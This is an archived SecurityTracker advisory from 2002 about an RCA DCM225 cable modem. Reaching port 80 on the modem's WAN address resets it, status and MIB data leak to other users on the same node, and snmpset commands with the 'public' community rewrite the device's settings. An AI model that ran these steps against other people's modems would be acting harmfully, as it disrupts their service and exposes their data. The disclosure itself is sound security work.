Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
|
|
|
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
|
|
|
|
|
|
|
|
|
|
|
RCA Cable Modem Denial of Service Error Lets Remote Users Reset the Device
|
Date: Mar 27 2002
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): DCM225, Possibly Others
|
Description: A denial of service vulnerability was reported in the RCA DCM225 cable modem. A remote user can cause the modem to reset user connections.
A remote user can reportedly connect to port 80 on the device using the device's 10.x.x.x IP address to cause the modem to reset. It is reported that a remote user can access this port on other user's modems in the same cable node.
|
Impact: A remote user can cause the modem to reset. Doing this repeatedly can create a denial of service condition.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.rca.com/ (Links to External Site)
|
Cause: Not specified
|
Reported By: "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 26 Mar 2002 22:29:41 -0300
From: "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar>
Subject: RCA cable modem Deny of Service
|
This is a multi-part message in MIME format.
--------------521D59C26B5D2F51897D6A5C
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
--------------521D59C26B5D2F51897D6A5C
Content-Type: text/plain; charset=us-ascii;
name="RCA_cablemodem.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="RCA_cablemodem.txt"
------------------------------------------------------------------------------
Web: http://qb0x.net Author: Gabriel A. Maggiotti
Date: March 26, 2002 E-mail: gmaggiot@ciudad.com.ar
------------------------------------------------------------------------------
General Info
------------
Problem Type : deny of service, misconfiguration and leak of information
Vendor : www.rca.com
Product : RCA cablemodems
Model : DCM225 (perhaps others)
Scope : Remote
Risk : High
Summary:
-------
The RCA Digital Cable Modem serves as a two-way high-speed bridge between your
personal computer and a cable Internet Service Provider (ISP). i It converts
information that originates from the Internet or your computer into electronic
messages that can be transported over the same wires your cable company uses to
transport video signals.
Problem:
-------
1- Deny of Service:
The RCA cable modem has two devices, the one for local connection is 192
.168.100.1 . This device is used for information request about the status of
the cable. The other device is 10.x.x.x and gives the same information.
If you connect to the second device (10.x.x.x) on port 80, RCA cable
modem reset the user connection with inet. I proved it with my own wan ip 10.1.1
.x and with other cablemodem users IP's in the same wan. All of them reset
when I remotly connect to port 80 of the cablemodems.
2- Leak of Information:
I can connect to the wan IP 10.x.x.x of any cablemodem user in my node,
and take a look at the users cablemodem status information such as:
USB: Inactive
Ethernet: 100
BaseT
MAC Address: 00 10 95 0a 05 62
User: Active
Signal Acquired at 573 MHz
SNR: 36.0 dB
Received Signal Strength: -4.0 dBmV
Micro-Reflections: 20 dBc
Connection: Acquired
Frequency: 37 MHz
Power Level: 44.0 dBmV
Channel ID: 4
Number of user conected: 1
I can dump user cablemodem MIB's too.
I can search in MIB table looking for my node server. I know that the
node IP start with 10.x.x.x and I started to search in the MIB Ops, a found
it!
69.1.4.2.0 = IpAddress: 10.20.250.1
69.1.4.3.0 = IpAddress: 10.20.250.1
69.1.4.4.0 = IpAddress: 10.20.250.1
69.1.4.5.0 = "docsis_light_avalos"
And then I recognize the word "avalos" becouse is the name of the street
where the node fisicaly is.
3- Misconfiguration cause you can write my own MIB table. Take a look:
<quote>
[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public
system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS
2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57
system.sysContact.0 = unassigned sysContact
system.sysName.0 =
system.sysLocation.0 =
system.sysServices.0 = 79
[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame
system.sysName.0 = lame
[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s
lame_cyty
system.sysName.0 = lame_city
[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public
system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS
2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96
system.sysContact.0 = unassigned sysContact
system.sysName.0 = lame
system.sysLocation.0 = lame_city
system.sysServices.0 = 79
</quote>
------------------------------------------------------------------------------
research-list@qb0x.net is dedicated to interactively researching vulnerab-
ilities, report potential or undeveloped holes in any kind of computer system.
To subscribe to research-list@qb0x.ne t send a blank email to
research-list-subscribe@qb0x.net. More help available sending an email
to research-list-help@qb0x.net.
Note: the list doesn't allow html, it will be stripped from messages.
------------------------------------------------------------------------------
--------------521D59C26B5D2F51897D6A5C--
|
|
Go to the Top of This SecurityTracker Archive Page
|
